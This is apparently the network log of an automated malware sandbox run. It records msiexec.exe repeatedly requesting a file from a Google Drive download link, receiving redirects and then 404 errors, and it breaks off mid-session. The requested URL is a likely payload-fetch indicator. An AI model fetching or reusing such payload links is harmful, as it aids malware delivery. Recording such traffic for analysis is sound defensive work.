                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549787142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:19 UTC216OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  2025-01-10 14:16:19 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:19 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-lCVFdGEE8QaVDeCBxDJeVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549798142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:20 UTC258OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  2025-01-10 14:16:20 UTC2236INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC77QUmrDVMiTRncsNSvDJp_zXgMUc9JUEgPfCXC2HodF_E61GtyYACKLB-IV_Q2BABg1m1NAZA
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:20 GMT
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-MCbsrMTjJ6WVhEcrwrVhyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Set-Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ; expires=Sat, 12-Jul-2025 14:16:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 77 43 6a 74 38 52 53 66 4c 39 48 5a 59 6a 70 74 69 71 76 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fwCjt8RSfL9HZYjptiqvmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549804142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:21 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:22 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:21 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-uotKq6higgBQLgX69grkSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.549815142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:22 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:23 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgQat30fzFAgI8QZEYdyq6HYXF6c6p6UvG9q_V5Pe8OWKjKs19yLeBrEulo1vFLLLU9Y
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:22 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-tgdC_fHb8WKZ21Og2b6ocQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 63 44 62 72 59 6e 48 77 51 35 37 51 72 33 52 38 56 74 35 37 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fcDbrYnHwQ57Qr3R8Vt57A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.549821142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:23 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:24 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:24 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: script-src 'nonce-GlfmVMI7KKWwcgsC8CU6Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.549831142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:25 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:25 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgSgMjT3ChTXkj4v1iF_2GQ5PSkMsaXysGusCdVi884oCnU_pTyUaKO8Bg0zm4DLhoE3
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:25 GMT
                                                                  Content-Security-Policy: script-src 'nonce-psRMHbmluWfdSwqnP4gHgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:16:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 32 5f 54 6e 4e 51 41 78 47 53 54 5f 38 6f 79 44 6e 62 69 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2_TnNQAxGST_8oyDnbibw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.549838142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:26 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:26 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:26 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-MFul956fj6PJs3SHADjpcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.549843142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:16:27 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:16:28 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgRTYnoXupb7amqX4iU6r7PfiWX5A9pzjKjHNF-3TCiR9XuROx66ntmKdTkQ6BWBgpAb
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:16:27 GMT
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: script-src 'nonce-kyY2tjNo2FpN8THut1g5QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
